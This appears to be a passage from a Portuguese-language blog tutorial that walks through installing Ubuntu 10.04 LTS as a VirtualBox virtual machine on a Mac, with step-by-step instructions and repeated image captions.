Clique em Selecionar no canto inferior direito

Execucaoooo
Execucaoooo

Na Tela Seguinte clique em Continue

Execucao_6
Execucao_6

O mesmo dará um resumo do seu tipo de disco de instalação (nosso caso uma .ISO)

Execucao_7
Execucao_7

O VirtualBOX dará uma mensagem assim

Aviso
Aviso

De OK para continuar a instalação.

A máquina será reiniciada tomando como boot a sua .ISO ou CD/DVD escolhido nos passo anteriores

Nossa primeira tela de Instalação ficou assim

VM_1
VM_1

A partir de agora começamos de verdade nossa VM (Virtual Machine – Máquina Virtual) Clique em Instalar Ubuntu 10.04 LTS

Chegaremos agora à tela de escolha de Local onde vc se está (Fuso Horário)

VM_2
VM_2

Agora teremos que configurar o layout do teclado…. Em nosso teste foi usado um Macbook White 2009 e o layout é USA-USA internacional como na imagem

VM_3
VM_3

Chegamos na escolha do disco, faça como na imagem abaixo

VM_4
VM_4

O utlilitario pedirá seu nome e uma senha(nunca esqueça sua senha)

VM_5
VM_5

O Utilitário lhe mostrará um resumo de tudo que foi defenido anteriormente sobre a instalação

Resumo_Instalacao
Resumo_Instalacao

Seguem alguns SCREENS do processo de Instalação

Instalacao_VM1
Instalacao_VM1
Instalacao_VM2
Instalacao_VM2
Instalacao_VM2
Instalacao_VM2

Ao chegar nessa Tela

Instalacao_VM7
Instalacao_VM7

Peça para reiniciar, você recebera uma imagem semelhante a essa

Instalacao_VM8
Instalacao_VM8

Onde o Utilitário pede para que você tire o disco de instalação. Caso esteja utilizando uma .ISO como nós do app, basta CLICAR no Ícone CD

Tirar_ISO
Tirar_ISO

E depois clicar na .ISO marcada pra desmarcar

Tirar_ISO2
Tirar_ISO2

Feito isso,você não corre o risco de entrar no processo de instalação novamente.

Doooguinha como faço para iniciar minha VM (Virtual Machine – Máquina Virtual)?

Vá até o Menu Ir(Go)-> Aplicativos(Aplications)

Tela_9
Tela_9

Dentro da pasta Alicativos (Aolications) procure pelo Nome/Icone VIrtualBox

Tela_10
Tela_10

Após aberto o Virtual BOX voltará a seguinte interface

Iniciar_VM
Iniciar_VM

Do lado esquerdo marque a VM (Virtual Machine – Máquina Vrtual) que quer iniciar e clique em Iniciar no painel superior do programa

Iniciar_VMm
Iniciar_VMm

Vejamos agora o resultado de todo nosso esforço

VM_pronta1
VM_pronta1
VM_pronta2
VM_pronta2
VM_pronta3
VM_pronta3

É isso ai galera, agora vocês têm um ambiente de teste e estudos Pronto e totalmente isolado do Sistema Operacional, onde não haverá problemas em executar qualquer comando ou rotina arriscada, qualquer coisa que aconteça na VM (Virtual Machine – Máquina Vitual) não afetará o Sistema Operacional. Obrigado a todos pela visita. :D